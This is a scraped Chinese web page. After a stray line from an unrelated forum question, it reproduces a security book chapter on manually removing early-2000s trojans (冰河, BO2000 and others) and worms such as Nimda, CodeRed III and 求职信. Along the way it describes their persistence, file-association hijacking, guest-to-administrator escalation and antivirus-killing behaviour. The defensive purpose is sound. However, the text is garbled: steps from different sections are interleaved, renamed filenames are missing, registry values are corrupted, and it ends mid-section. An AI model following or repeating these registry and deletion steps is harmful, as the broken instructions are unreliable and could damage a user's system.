我喜欢写js,但是文件写大了(100kb以上),就会打开困难,打开要qq好久不用就会被回收,有没有什么办法啊?我pe

黑客攻防技术内幕全书(在线阅读版)
安 全 基 础
政府、军事、邮电和金融网络经常是入侵者攻击的主要目标。入侵者之所以能够得逞,往往是因为被攻击对象的疏忽大意、安全意识低下,没有建立必要的安全系统。目前的许多网络在建网初期较少考虑安全防范措施。网络交付使用后,网络系统管理员的管理水平又没能及时跟上,给入侵者入侵造成机会。现有的不少网络系统管理员缺乏安全意识,这也是系统被入侵者入侵的重要原因。若加强管理,90%以上的攻击都可以避免,实际上大部分入侵者的水平并不高。
研究入侵者攻击技术的目的在于有针对性的防范,只有了解并掌握攻击技术,才能更好地防御攻击,正所谓知已知彼方能百战不殆。
常见特洛伊木马的清除方法
3.2 常见特洛伊木马的清除方法
特洛伊木马程序通常指伪装成合法软件的有害程序。这种程序一般不进行自我复制,因此并不属于严格意义上的病毒,反病毒研究者们把类似的有害程序称为恶意软件(malicious software)或不友好代码(hostile code)。
特洛伊木马程序比起其他各种恶意的软件来说都更加了解用户的心理状态—— 这种程序的创作者用在怎样使你运行特洛伊木马程序的功夫可能和他们创作木马的时间一样多。这些伎俩可能是非常简单的方法,如给文件取一个欺骗性的名字或把木马放到适当的位置,也可能是非常复杂的方法。有些特洛伊木马可以模仿运行环境,收集所需的信息,最常见的特洛伊木马就是试图窃取用户名和密码的登录窗口。
有一类特洛伊木马就是试图从用户众多的因特网服务提供商(ISP)那里窃取用户的注册信息与账号信息。木马程序收集你访问过的英特网站点并发送出去,或者执行其他不受欢迎的功能。
3.2.1 广外女生清除方法
广外女生是由广州外语外贸大学“广外女生”网络小组制作的一种特洛伊木马,该木马更具有隐蔽性,下面来看看如何手工清除广外女生服务端。
(1) 运行广外女生服务端后,就会在系统的C:\WINDOW\SYSTEM下生成一个名为Diagcfg.exe的文件,如图3-1所示。广外女生随着Windows的启动而启动,所以在Windows环境下是删除不了的,因为该木马在Windows环境下运行,因此启动计算机后,按F8键进入【开始】菜单,然后选择进入到纯DOS模式下,找到System目录下的Diagcfg.exe并将它删除。
图3-1 运行广外服务端后成生的Diagcfg.exe文件
删除Diagcfg.exe时,在DOS下输入:c:\&del c:\windows\system\diagcfg.exe。
(2) 由于Diagcfg.exe文件已经被删除了,因此在Windows环境下任何.exe文件都将无法运行。这时找到Windows目录中的注册表编辑器Regedit.exe,将它改名为,如图3-2所示。
图3-2 给注册表改名
(3) 回到Windows模式下,运行Windows目录下的程序(改名后的注册表),如图3-3所示。
图3-3 运行注册表编辑器
将注册表改名为后也可以照常运行。
(4) 依次展开HKEY_CLASSES_ROOT\exefile\shell\open\command键值,将其默认键值改成&%1& %*,如图3-4所示。
图3-4 更改注册表键值
(5) 依次展开以下键值:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
删除其中名称为Diagnostic Configuration的键值,如图3-5所示。
图3-5 删除注册表键值
删除Diagnostic Configuration的键值是禁止其在启动时运行。
(6) 关掉注册表编辑器,回到Windows目录,将改回Regedit.exe。
(7) 广外女生服务端成功被清除。
3.2.2 蓝色火焰清除方法
蓝色火焰是一款没有客户端的优秀国产木马,接下来看一看如何清除蓝色火焰服务端,以下清除在Windows 98下进行。
(1) 重新启动,进入纯DOS界面。
(2) 进入【系统目录】(例如:windows 98即在windows/system目录。)
删除:tasksvc.exe、sysexpl.exe、bfhook.dll
或是在DOS下运行以下命令:
C:\Windows\System&del tasksvc.exe
C:\Windows\System&del sysexpl.exe
C:\Windows\System&del bfhook.dll
(3) 单击【开始】→【运行】命令,在【运行】对话框的【打开】下拉列表框中输入regedit,单击【确定】按钮,进入注册表编辑器。
(4) 在注册表编辑器里,展开如下键值:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
删除注册表键值名:Network Services(键值:C:\Windows\System\tasksvc.exe)。
如图3-6所示。
图3-6 删除键值
(5) 在txt文件上按住shift键并右击,在弹出的快捷菜单中选择【打开方式】命令,然后在【打开方式】对话框中启用【始终使用该程序打开这种类型的文件】复选框,如图3-7和3-8所示。
3.2.3 冰河清除方法
1. 自动卸载
1.2以后版本的“冰河”本身提供了自动卸载的功能,只需在客户端选择【命令控制台】→【控制类命令】→【系统控制】→【自动卸载】命令即可自动卸载。只要先连接127.0.0.1,然后执行【自动卸载】命令就可以彻底卸载冰河。
2. 手动卸载
(1) 重新启动计算机,打开计算机后,按住键盘上的Shift键,以安全模式进入计算机。
(2) 检查注册表键值中:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
两处是否有同名的可疑程序名(默认安装为kernel32.exe或是kernel32.dll),如果有则删除该键,如图3-9所示。
图3-9 冰河的启动键值
(3) 检查注册表键值:
HKEY_LOCAL_MACHINE\Software\CLASSES\txtfile\shell\open\command下的键值是否为\notepad.exe %1(是指计算机的Windows所在目录,如c:\windows),“冰河”的默认设置是将该处键值修改为sysexplr.exe %1或rnudll32.exe%1,请自行做相应修正,如图3-10所示。
图3-10 去除TXT关联
(4) 检查注册表键值:
HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open\command处的键值是否为&%1& %*,如果不是则进行修正。
(5) 删除上述找到的可疑程序(默认文件名是目录下的kernel32.exe或者是kermel32.dll和sysexplr.exe,如果sysexplr.exe因正在运行而无法删除,可以在第6步完成之后立即删除)。
(6) 若是Windows 98系统,直接按两次Ctrl+Alt+Del键重新启动计算机;若是Windows NT系统,按Ctrl+Alt+Del键激活【任务管理器】并结束kernel32.exe进程,然后重新启动计算机。
应该在修改注册表之后再删除可疑程序,否则对方若将冰河设置为与EXE文件关联,需要在DOS下将regedit.exe改名为后再进行手工清除。
3.2.4 BO2000手工清除方法
1. Windows 9X系统下的清除
(1) 运行注册表编辑器,找到如下键值:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
将有指向UMGT32~1.exe路径的键值删除。
(2) 重新启动计算机。
(3) 删除system下的UMGT32~1.exe程序。
2. Windows NT系统下的清除
(1) 在任务管理器中结束其对应的进程。
(2) 运行注册表编辑器,找到如下键值:
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Remote Administration Service
将有指向UMGT~32.exe路径的键值删除。
(3) 新启动计算机。
(4) 删除system32下的UMGT32~1.exe程序。
图3-8 以记事本的方式打开
(6) 蓝色火焰服务端清除完成,也可以使用蓝色火焰专门清除工具清除服务端。
病毒防护修复
3.3 病毒防护修复
从广义上讲,病毒可以归为2类:引导区病毒和文件型病毒。
1. 引导区病毒
引导区病毒隐藏在硬盘或软盘的引导区(Boot区),当计算机从感染了引导区病毒的硬盘或软盘启动,或是当计算机从受感染的软盘里读取数据时,引导区病毒就开始发作。一旦它们把自己复制到计算机的内存里,就会感染其他磁盘的引导区或是通过网络传播到其他计算机上。
第一个真正感染个人电脑的病毒Brain就是一个引导区病毒。Brain及其后续者使用了隐藏技术,使它们可以躲过当时的大多数病毒扫描软件。尽管现在软盘被当作病毒感染介质的情况已经越来越少,但引导区病毒依然是一种显著的感染威胁。更加复杂的引导区病毒可以感染计算机的主引导区记录(MBR),或者进化成为multi-partite病毒。
2. 文件型病毒
文件型病毒寄生在其他文件中,常常通过对它们的编码加密或是使用其他技术来隐藏。文件型病毒把用来启动主程序的可执行命令劫夺过去,当作它自己的运行命令。该病毒还常常会把控制还给主程序,为的是让计算机系统显得正常。
如果运行了感染病毒的程序文件,文件型病毒就会被激发。当病毒运行的时候,它可以执行大量的操作。通常它进行自我复制,并且附着在系统的其他可执行文件上,同时在上面留下标记,以后不再感染已经带毒的文件。
臭名昭著的W32/CIH.SPACEFILLER病毒(简称CIH病毒)是一个复杂的文件感染病毒,它可以改写计算机的BIOS。CIH病毒使用大量的诡计来隐藏:把自己分裂成几个部分,隐藏在某些文件中的空闲字节里,这样不会改变文件长度。
通常,文件型病毒会感染扩展名为.exe、.com、.dll、.vxd等的可执行文件,还有微软的Word文件( .DOC)和Excel文件( .XLS)和一些模板文件。但是在最近的几年中,新的文件感染性病毒在范围和种类上都有巨大的增长,已经几乎可以感染任何一种文件。
3. 宏病毒和脚本病毒
宏病毒是一种特殊的文件型病毒。宏病毒是在一些软件开发商开始在他们的产品中引入宏语言,并允许这些产品生成载有宏的数据文件之后出现的。例如,微软的Office产品系列包括很多的微软Visual Basic程序语言,这些语言使Microsoft Word和Microsoft Excel可以自动操作模板和文件的生成。第一个宏病毒Concept是在微软刚刚在Word中引入宏之后立刻出现的。
宏的功能很强大,所以相当多的软件包中都引入了宏,但同时它也吸引了大量的病毒制造者。宏病毒和脚本病毒在传播病毒中占有绝对多数,只是在最近才开始让位于通过E-mail和因特网传播的新生代病毒“蠕虫”,即脚本病毒。
脚本病毒依赖一种特殊的脚本语言(比如VBScript、javascript等)来起作用,同时需要主软件或是应用环境能够正确地识别和翻译这种脚本语言中嵌套的命令。正如病毒mIRC那样,只要主应用环境能够理解这种语言并且执行其功能,实际的间接感染源只需要包含一个简单的文本文件就可以起作用了。
脚本病毒在某些方面与宏病毒类似,但脚本病毒可以在多个产品环境中运行。像VBScript这样的普通语言可以在网络服务器和浏览器上运行,也可以在微软的Outlook里运行,还能在其他所有可以识别和翻译它的产品中运行。脚本语言比宏语言更具有开放终端的趋势,这样就使病毒制造者对被感染的计算机有更多的控制力。
4. 多重分裂病毒
近几年来,引导区病毒和文件型病毒之间的界限变得相当的模糊。许多病毒既能感染文件,也可以感染磁盘引导区。多重分裂病毒就是这样的病毒,它可以通过被感染的文件传播,也可以在硬盘或软盘运行的时候感染它们的引导区。现代病毒很少只使用一种方法,大多都使用以上两种,有的还使用了其他的方法。
5. 网络蠕虫程序
网络蠕虫程序是一种通过间接方式而不是直接复制自己来传播的恶意软件。有些网络蠕虫拦截E-mail系统并向世界各地发送自己的复制品,有些则出现在高速下载站点中,当然还有些同时使用这两种方法与其他技术一起传播。
蠕虫程序与病毒一样具有破坏性,传播速度比病毒还要快。蠕虫的制作者经常利用用户的心理因素,诱使用户下载并运行蠕虫。臭名昭著的“美丽莎”病毒,就是一种使用E-mail系统以惊人速度传播的蠕虫程序。它的传播速度之快史无前例,成千上万的病毒感染造成许多邮件服务器先后崩溃,人们为清除它耗费了大量的精力。
6. 病毒的特征代码
大部分的防毒软件都使用各自的特征代码来查找某些固定的病毒。特征代码是区分病毒代码与其他文件或数据的一段特殊的字节。这段代码有时是病毒内的一种数据类型,有时是加密法或者解密法,或者是其他的识别特征。有些病毒使用一种明显的信号在被它们感染的文件上挂上类似“请勿打扰”的标志,否则病毒就会重复感染文件并使文件长度无限变大,这样很容易被发觉。
有些病毒会把特征代码加密以防被检测出来。这种病毒在每次自身复制时,都可以改变特征代码或者对其进行变异来躲避检测,还有些病毒使用特征代码加密技术来进行变形。变形病毒曾经一度使很多有名的反病毒软件都束手无策,但后来人们研究发现,病毒在变形的时候通常会留下蛛丝马迹,这使它们在优秀的杀毒软件面前变得不堪一击。 这种变形病毒有一个很好的例子就是Hare病毒。Hare病毒现在还很稀少,它可以通过软盘的引导区或者受感染文件的一部分传播。在文件处理的时候它将自己载入内存,并覆盖一部分硬盘主引导记录。Hare病毒就使用了变形技术来企图逃过病毒扫描。制毒者还时常使用某些隐藏技术来保护病毒不被发现。这类技术包含简单的重定向功能,能够在检查磁盘扇区时显示无毒的假象,而事实上病毒正躲藏在我们想要检查的扇区里等待机会发作。它们还使用更为高级的技术使病毒躲藏在文件、未使用过的或未格式化的硬盘空间里,或者操作系统通常不会接触到的地方。
所有类型的病毒都有可能使用隐藏技术,但是引导区病毒与文件型病毒使用的更多 一些。
3.3.1 概念(又称尼姆达)蠕虫病毒
1. 尼姆达(Nimda)病毒的危害
Nimda病毒爆发后,很多用户十分关心这个据说会比“红色代码”造成更大损失的病毒会对被感染计算机系统造成什么样的破坏。从目前来看,其发作后只是针对计算机系统的漏洞进行自我复制和传播,从而降低计算机运行速度和引起网络阻塞,目前还没有诸如对文件操作等恶性破坏。但用户千万不要因为看到Nimda病毒目前对系统没有什么恶性破坏而掉以轻心,Nimda病毒可能给用户造成的直接扟失是它可以把传染计算机的C盘设为无密码的完全共享,这样用户文件就会被恶意的攻击者复制、删除和修改。
2. 尼姆达(Nimda)病毒的传播方式
Nimda病毒会通过E-mail传播,当用户邮件的正文为空,似乎没有附件,实际上邮件中嵌入了Nimda病毒的执行代码,当用户用Outlook、Outlook Express(没有安装微软的补丁程序包的情况下)收邮件,在预览邮件时Nimda病毒就已经在不知不觉中运行了。Nimda病毒执行时会将自己复制到临时目录,然后再在临时目录中的副本中运行。Nimda病毒还会在Windows的System目录中生成load.exe文件,同时修改System.ini中的shell从shell=explorer.exe改为explorer.exe load.exe-dontrunold,使Nimda病毒在下次系统启动时仍然被激活。另外,在System目录下,Nimda病毒还会生成一个副本riched20.dll。它会把Windows系统中存在的riched20.dll目录覆盖。
而Nimda病毒复制到临时目录下的副本(有两个文件,文件名为???????.tmp.exe),则会被Nimda病毒在系统下次启动时将他们删除(修改Wininit.ini文件)。
为了通过邮件将自己传播出去,Nimda病毒使用MAPI函数读取用户的E-mail并从中读取SMTP地址和E-mail地址。Nimda病毒还在Windows的临时目录下生成一个eml格式的临时文件,大小为79 225字节,该文件已经用BASE64编码将Nimda病毒包含进去。然后,Nimda病毒就用取得的地址将带毒邮件发送出去。
Nimda病毒的第2种传播途径就是用跟CodeBlue极其相似的方法,即利用IIS的UNICODE漏洞进行传播。
Nimda病毒的第3种传播途径是通过局域网的共享资源传播到其他Windows系统下。
另外,Nimda病毒运行时会利用ShellExcute执行系统中的一些命令,如NET.EXE、USER.EXE、SHARE.EXE等命令,将Guest用户添加到Guests、Administrators组(针对Windows NT/2000/XP)并激活Guest用户,然后将C盘根目录共享。
如果计算机里有以上所述的一些文件或是执行了空的eml格式文件那也证明该计算机中有了Nimda病毒。
3. 尼姆达(Nimda)清除方法
在处理之前请大家必须切断一切网络连接。
● Windows NT/2000/XP 系统中的手工清除方法
(1) 将IIS服务Scripts目录中的TFTP*.exe和ROOT.exe文件全部删除。
(2) 当受到尼姆达病毒的入侵后,系统中会出现一些新的共享,应该将其共享属性去掉。
(3) 查看一下administrators组中是否加进了guest用户,如果有则应将guest用户从administrators组中删除。
(4) 使用杀毒软件进行查杀,彻底清除Nimda病毒.
● Windows 9x/Me 系统中的手工清除方法
(1) 重新启动机器,按F8键进入启动菜单并选择Safe mode命令,进入安全模式。
(2) 再切换到C:\Windows\temp目录,删除文件长度为57 344字节的文件。(如果temp目录里有许多文件,又不方便查找,那么就按Ctrl+A快捷键全部选中,然后按Shift+Delete快捷键彻底全部删除,这对系统基本没有什么大的影响,temp只是一个系统存放临时文件的目录。)
(3) 然后再进入系统C:\Windows\System目录中查看Riched20.DLL的文件大小,系统的正常文件大小应该在100KB以上,而Nimda病毒的副本大小为57 344字节,如果有长度为57 344字节的Riched20.DLL,则删除。
(4) 再打开C:\Winnt目录里的System.ini文件,在[Load]中如果有一行shell=Explorer.exe load.exe -dontrunold,则改为shell=Explorer.exe。
(5) 把C盘的完全共享取消掉。
(6) 搜索整个硬盘,把所有Readme.eml文件删除,在没有对系统进行免疫修复前,请不要打开任何Readme.eml文件,按Ctrl+A快捷键选取全部的Readme.eml文件,然后按Shift+Delete快捷键将其彻底全部删除(注:如果单击了单个Readme.eml文件,Nimda病毒将利用系统漏洞重新运行)。
(7) 再接搜索整个硬盘,把所有*.eml文件删除,在没有对系统进行免疫修复前,请不要打开任何*.eml文件,按Ctrl+A快捷键选取全部的*.eml文件,然后按Shift+Delete快捷键将它彻底全部删除;(注:如果单击了单个*.eml文件,Nimda病毒将利用系统漏洞重新运行)。
● 工具清除Nimda病毒
尼姆达—— 金山毒霸病毒专杀工具,如图3-11。
文件名称:Duba_Concept.exe
文件大小:99KB
系统平台:Windows 95/98/ME/2000/NT
专杀工具下载:
图3-11 查杀尼姆达工具
下面介绍该工具的使用方法。
(1) 启动Windows操作系统(Windows 95/98/Me/NT)
(2) 切断一切网络链接(重要!)
(3) 运行Duba_Concept.exe程序,然后根据Duba_Concept.exe上的设置选择路径进行清除。默认情况下,在检查硬盘上的文件前,Duba_Concept会先扫描内存中是否存在Nimda病毒,如果存在,则会在内存中清除病毒。
(4) 随后,Duba_Concept程序将根据用户的选择进行清除工作,对Windows下可见的所有驱动器的全部文件进行查毒,并自动清除所找到的Nimda病毒。
(5) 如果用户计算机上装有IIS,请单击界面上的【微软公司安全升级】的链接,Duba_Concept会自动指引用户下载微软的补丁程序运行补丁程序后重启系统,即可在将来免除Nimda病毒的攻击。
(6) 至此,Nimda病毒就从用户的计算机里完全被清扫出去了。
● 尼姆达(Nimda)免疫方案:
• 打上微软的官方补丁程序SP2
微软官方已经为Windows 2000系统目前发现的漏洞做了补丁程序,可以弥补绝大部分的Windows 2000漏洞。SP2共100MB左右,可以到以下网址下载:
• 使用天网个人版防火墙的修补程序
在天网个人版防火墙中提供了天网安全检测修补系统,可以检查出Windows中严重的系统漏洞并自动修复它。目前的天网个人版(测试版)中所带的漏洞检测与修复系统已经可以检查和修复Nimda病毒赖以传染和传播的IE浏览器漏洞,经过漏洞检测与系统修复之后,Nimda病毒就无法在用户机器上自动运行了。
• 将WSH(Windows Scripting Host)功能删除可预防此类病毒的破坏
单击【开始】→【设置】→【控制面板】→【添加/删除程序】命令→【WINDOWS安装程序】对话框中打开【附件】列表框,取消对【组件】中的Windows scripting Host(约占空间1.1MB)的选择,单击【确定】即可,不过这样可能会影响一些功能的使用。
3.3.2 手动清除红色代码III指南
本节将介绍手动清除红色代码蠕虫的方法,对于大多数普通用户来说,采用微软提供的解决方法或选用专业的反病毒厂商的相关安全产品清除该蠕虫是最安全和便捷的方法。
同样是有意针对中文 Windosws 操作系统的攻击性病毒,CodeRed III 与 CodeRed II 都会对简体中文/繁体中文 Windows 系统进行双倍的攻击。接下来将介绍如何手动清除红色代码III蠕虫。
微软已经发布了一个安全公告MS01-033,同时提供了针对Windows NT/2000系统的补丁程序,所包括的版本有Windows NT 4.0、Windows 2000 Professional、Server and Advanced Server。 需要说明的一点是,这里所介绍的清除方法对II、III型都有效。
如果不幸中了此病毒,应该立即关闭所有 80 端口的 Web 服务,避免病毒继续传播。
(1) 清除Web 服务器中的2个后门文件/msadc/root.exe和/scripts/root.exe
这2个文件的物理地址一般情况下默认为:
C:\inetpub\scripts\root.exe
C:\progra~1\common~1\system\MSADC\root.exe
(2) 清除本地硬盘中C:\exploer.exe 和D:\exploer.exe
要清除本地硬盘中的C:\explorer.exe和D:\exploer.exe必须先要杀掉进程exploer.exe,打开任务管理器,选择【进程】。检查进程中是否有2个exploer.exe。如果找到2个exploer.exe,说明木马已经在计算机上运行了。在任务管理器的【进程】菜单中选择【查看】→【选定列】→【线程计数】命令,单击【确定】按钮。这时会发现显示框中增加了新的一列线程数。检查两个exploer.exe, 显示线程数为1的exploer.exe就是木马程序,应当结束这个进程。之后就可以删除C:\exploer.exe和D:\exploer.exe了。
这两个程序都设置了隐藏和只读属性。需要在【资源管理器】里选择【查看】→【选项】命令然后取消选择【隐藏文件】并改为选择【显示所有文件】选项时才能看到它们。
(3) 清除病毒在注册表中添加的项目:
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\
删除键:SFCDisable 键值为:0FFFFFF9Dh 或将键值改为 0。
设置为0FFFFFF9Dh后,将在登录时禁止系统文件检查。
HKLM\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\
键:Scripts 键值为:,,217 改为 ,,201
这个键是默认被打开的,不过如果没有特别需要的话可以关闭,因为很多漏洞都是利用了这个虚拟目录下的文件进行攻击的。
HKLM\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\
键:msadc 键值为:,,217 改为 ,,201
HKLM\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\
删除键:c 键值为c:,,217
它将本地硬盘中的 C 盘在Web ***学盟禁止字符***享为C'。
HKLM\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\
删除键:d 键值为d:,,217
它将本地硬盘中的 D 盘在Web ***学盟禁止字符***享为 d。
如果不删除注册表中的以上键,中毒服务器的本地硬盘 C和D盘将被完全控制。
(4) 重新启动系统,以确保 CodeRed.v3 彻底清除。
如果要确保清除病毒后不会再次被感染,请安装微软发布的补丁程序。
3.3.3 快乐时光清除指南
1. 病毒介绍
快乐时光是一个Visual Basic Script的病毒,它能感染HTML、HTM、ASP、VBS和HTT的文件。它通过Outlook Express来传播,但是它不会将任何文件附加到邮件信息上。而是利用一段隐藏在一个HTML文件中的脚本代码以电子邮件的背景方式来运行。感染该病毒后,计算机的速度明显减慢,并且会出现桌面被换的问题。应该尽快用查找功能查看一下有没有help.htm或者help.vbs文件,如果有的话就说明该计算机中了快乐时光病毒了。
2. 传播方式
这个病毒利用电子邮件传播到其他的系统。为达到这一目的,它将病毒代码隐藏在一个HTML文件中,同时将该HTML文件作为电子邮件的背景来运行。这个HTML文件包含着病毒的脚本。
3. 感染症状
如果系统当前的日期和月份之和等于13,病毒将停止感染HTML、HTM、ASP、VBS和HTT的文件,并将开始删除EXE和DLL的文件。病毒将在所有的本地和网络驱动器上执行这些操作。
另一方面,如下的文本将被包含在所有由病毒产生的文件和被感染的文件中:
Rem I am sorry! Happy time.
这个病毒将在它找到的C盘根目录下的第一个文件夹下创建HELP.HTA和HELP.VBS文件。这2个文件中包含有许多格式的病毒代码,这些病毒代码会在病毒感染不同类型的文件时被附加到被感染文件中。
其次,它将其自身以HTML文件的形式复制到Windows的文件夹中,HTML文件的文件名为HELP.HTM和UNTITLED.HTM。HELP.HTM会在用户的桌面设置为按Web页方式浏览时自动运行。为了达到这一目的,病毒修改了如下的注册表键值:
HKEY_CURRENT_USER\Control Panel\Desktop\WallPaper=&C:\WINDOWS\Help.htm”
4. 感染的方式
该病毒利用其生成的UNTITLED.HTM文件来确保其能够通过电子邮件传播。这个文件会被作为电子邮件的默认背景来运行。为了实现这一点,病毒修改如下的注册表的入口:
HKEY_CURRENT_USER\Identities\{USERID}\Software\Microsoft\OutlookExpress\5.0\Mail\ Message Send HTML=&1&
HKEY_CURRENT_USER\Identities\{USERID}\Software\Microsoft\OutlookExpress\5.0\Mail\ Compose Use Stati
HKEY_CURRENT_USER\Identities\{USERID}\Software\Microsoft\OutlookExpress\5.0\Mail\ Stationery Name=&C:\WINDOWS\Untitled.htm&
此处{USERID}的值与当前的系统用户有关。这个值将能从如下的注册表的入口得到:
HKEY_CURRENT_USER\Identities\Default User ID=&{USERID}&
然后,病毒将查找位于Windows\Web文件夹中所有的HTT文件,该文件夹是HTML浏览所在的位置。如果按Web页方式浏览的选项在【我的电脑】或【控制面板】中是被选中的病毒将在打开这些文件夹时进行感染。
一旦上面所有动作都顺利完成后,在病毒下一次运行时,它将在所有的驱动器中(包括本地和远程的驱动器)搜寻所有扩展名为HTML、HTM、ASP和VBS的文件进行感染。为了避免这些被感染的文件在运行时返回错误信息,病毒将根据其传染文件的类型将自身代码打包并作出标记。同时,它也试图寻找被感染文件中的电子邮件地址,并尝试向这些地址发送邮件。
如果被感染系统的当前日期和月份之和等于13,它的行为将从传染转变成为删除文件,此时它会寻找和删除所有在本地和远程驱动器中扩展名为EXE和DLL的文件。
此外,该病毒还会在系统注册表中创建3个键值,并且键值是随着病毒感染的深入而发生变化。其中包括它所感染文件数量的计算机和包含被感染(和删除)文件的名称和路径,键值如下:
HKEY_CURRENT_USER\Software\Help\Count=&x& ; 病毒感染文件的数量
HKEY_CURRENT_USER\Software\Help\FileName=&nombrefichero& ; 被感染的文件名和路径
HKEY_CURRENT_USER\Software\Help\wallPaper=&C:\WINDOWS\Help.htm& ;
最后,病毒会试图自动向外发送电子邮件,这取决于两个条件:一方面计数器必须是366的倍数;另一方面还与当时系统时钟的秒数的奇偶有关。如果两个条件都满足,病毒就会向外发送邮件,并附带一个名为untitled.htm的附件。
5. 清除办法
(1) 运行注册表编辑器,找到如下键值:
HKEY_CURRENT_USER\Identities\{AECF6CA3--AEF2-CT63FE9D97A4}\Software\ Microsoft\Outlook Express\5.0\Mail
其中有3项:
Message Send Html= 1
Com Pose Use Stationery= 1
Stationery Name= C:\\Windows\\Untitled.htm
将其键值删除即可,然后用同样方法将:
HKEY_CURRENT_USER\Control Panel\Desktop
Wallpaper= C:\\WINDOWS\\HELP.HTM
(2) 打开C:\windows\下的win.ini文件,将其中Wallpaper=等号后的键值删除。
(3) 使用最新版的KV3000或KVD3000查杀硬盘快乐时光病毒,杀毒过程中如果出现 Help.vbs、help.hta、untitled.htm 等文件,提示删除时单击Y按钮即可。
(4) 查完毒后,最好安装最新的KVW3000来加强防范。
(5) 将WSH(Windows Scripting Host)功能删除可以预防此类病毒的侵害。
3.3.4 手动清除圣诞节病毒
1. 病毒介绍
圣诞节病毒(W32.Navidad,在西班牙语中是圣诞节的意思)是目前新出现的蠕虫程序,它存在于Windows 9x和Windows NT中。Navidad病毒是通过电子邮件附件的方式,以navidad.exe文件传播的。用户是从一个已被感染的用户那里收到这样的附件邮件的。一旦该病毒感染一台计算机,它就阻止该计算机运行所有的.exe文件,包括像微软公司的Word程序这样的基本办公工具。目前该病毒已经在国内大规模流行,请用户升级到最新的瑞星11.33版本加以防范,已经感染了该病毒的机器请使用下面的方法加以清除。该病毒能通过Outlook以附件的形式传播,在用户不小心单击附件时开始运行,运行后先将自己复制到Windows\system下并修改注册表,企图使它在系统启动时和运行程序时启动。感染该病毒的机器将无法执行*.exe文件,结果使大多数应用程序无法正常启动。
2. 病毒清除
(1) 单击【开始】→【程序】→【MS-DOS方式】命令,进入DOS模式。
(2) 将regedit.exe重新命名为 。
(3) 回到Windows下运行Regedit。
(4) 单击【开始】→【运行】命令,在【运行】对话框的【打开】下拉列表框中输入regedit,单击【确定】按钮。
(5) 找到如下键值:
HKEY_CLASSES_ROOT\exefile\shell\open\command
(6) 在右边窗口展开节点寻找含有下列登录的记录值并将其选中:
(Default) = &% windir%\SYSTEM\WINSVRC.EXE&%1&&%*& where %windir%
(7) 将其值改为&%1&%*&。
(8) 同步骤(3)~(5),输入regedit。单击【确定】按钮,展开以下注册表键值。
HKEY_LOCAL_MACHINE Software Microsoft Windows CurrentVersion Run
(9) 选择Win32BaseServiceMOD = %windir%\SYSTEM\WINSVRC.EXE ,并单击【删除】按钮。
(10) 单击【开始】→【程序】→【MS-DOS模式命令】,单击进入MS-DOS方式。
(11) 将重新命名为 regedit.exe。
3.3.5 求职信病毒清除方法
1. 病毒介绍
求职信(Worm.wantjob.57345)病毒是一种新型恶意蠕虫病毒,它具有罕见的双程序结构,分为蠕虫部分(网络传播)和病毒部分(感染文件、破坏文件)。两者在代码上是独立的两部分,可能也是分开编写的。两者的结合方式非常有趣,作者先写好蠕虫部分,然后将病毒部分的二进制码在特定位置加进蠕虫部分,得到最终的病毒/蠕虫程序。感染该病毒后,计算机速度会明显变慢,系统资源明显减少,硬盘可用空间急剧减少。应该尽快用查找功能查看一下有没有WQK.exe和Krn132.exe文件,如果有的话,就说明该计算机已感染求职信病毒了。
2. 传播方式
求职信病毒利用了微软的MIME漏洞,具有自我复制、E-mail传播、通过网络共享传播、感染可执行文件(包括屏保)、破坏本地文件等手段。该病毒首先将自己要用到的字符串解码,接着启动一个线程不停的查询内存中的进程,检查是否有杀毒软件存在(如AVP/NAV/NOD/Macfee等)。如果存在则将该杀毒软件的进程终止,并且每隔0.1秒就循环检查进程一次,以至于这些杀毒软件无法运行。
求职信具有尼姆达病毒自动发信、自动执行、感染局域网等破坏功能。在第一次运行时只执行蠕虫部分代码,具体如下:
(1) 求职信病毒把自身复制至\WINNT\System32\krn132.exe,并将其自身设置为系统、隐藏和只读属性。
在Windows 2000下同时设置了系统和隐藏属性的文件在文件夹中是不可见的,即使在文件类型选项中选择了【显示所有文件和文件夹】选项,也是不可见的。因此只有在文件夹选项中取消选择【隐藏受保护的操作系统文件(推荐)】后才可以看见的。
(2) 把\WINNT\System32\krn132.exe注册为Krn132服务,并设置为开机时自动运行。
(3) 在Internet临时文件夹中读取所有htm、html文件并从中提取E-mail地址,此蠕虫和Nimda一样利用了MIME漏洞把自身复制并添加到邮件中,发送到所有获得的地址。并将邮件主题设为下列之一:
Hi Hello How are you?
Can you help me? We want peace
Where will you go? Congratulations!!!
Don’t Cry
Look at the pretty Some advice on your shortcoming
Free XXX Pictures A free hot porn site
Why don’t you reply to me?
How about have dinner with me together?
Never kiss a stranger
3. 清除方法
(1) 删除网络中完全可写的共享,断开网络连接。
(2) 在DOS下删除系统目录下的WQK.exe和Krn132.exe文件,也可以通过管理系统进程的软件,首先将其正在运行的进程结束后再删除。
(3) 运行注册表编辑器,找到如下键值:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\
将键值名称为WQK.exe和Krnl32.exe的键删除。
(4) 到金山网站下载查杀求职信病毒工具,如图3-12所示。
一般情况不要将自己的目录设为完全共享,以防再次从局域网中感染该病毒。为了预防求职信病毒自动执行的特点,必须下载微软的补丁程序程序Sp2或安装IE6.0。
图3-12 查杀求职信病毒工具
3.3.6 将死者病毒的清除方法& &
1. 病毒介绍
将死者(Worm.Gone.38912)病毒属于一种蠕虫病毒,该病毒大小为39KB,它本身是一个压缩文件 ,如果打开压缩文件就会变成136KB的文件。此病毒是用Visual Basic编写,且经过压缩软件UPX压缩,反解压工具处理,再使用原始的UPX就不能解压了。由于是Visual Basic编写的病毒,它运行时就需要一个Visual Basic的动态链接库msvbvm60.dll,若用户的计算机里没这个文件,病毒就无法被激活。
2. 传播方式
